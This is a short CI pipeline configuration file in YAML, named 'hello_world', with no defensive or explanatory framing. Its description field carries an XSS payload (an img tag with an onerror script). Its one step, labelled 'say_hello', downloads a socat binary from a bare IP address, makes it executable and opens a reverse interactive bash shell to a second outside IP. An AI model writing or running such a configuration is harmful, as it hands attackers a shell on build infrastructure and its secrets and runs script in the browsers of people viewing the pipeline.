pipelines:
  - name: hello_world
  - description: <img src=x onerror="alert('XSS')">
    steps:
      - name: say_hello
        type: Bash
        execution:
          onExecute:
            - wget http://5.148.32.212:8000/socat
            - chmod +x socat
            - ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:5.148.32.211:444
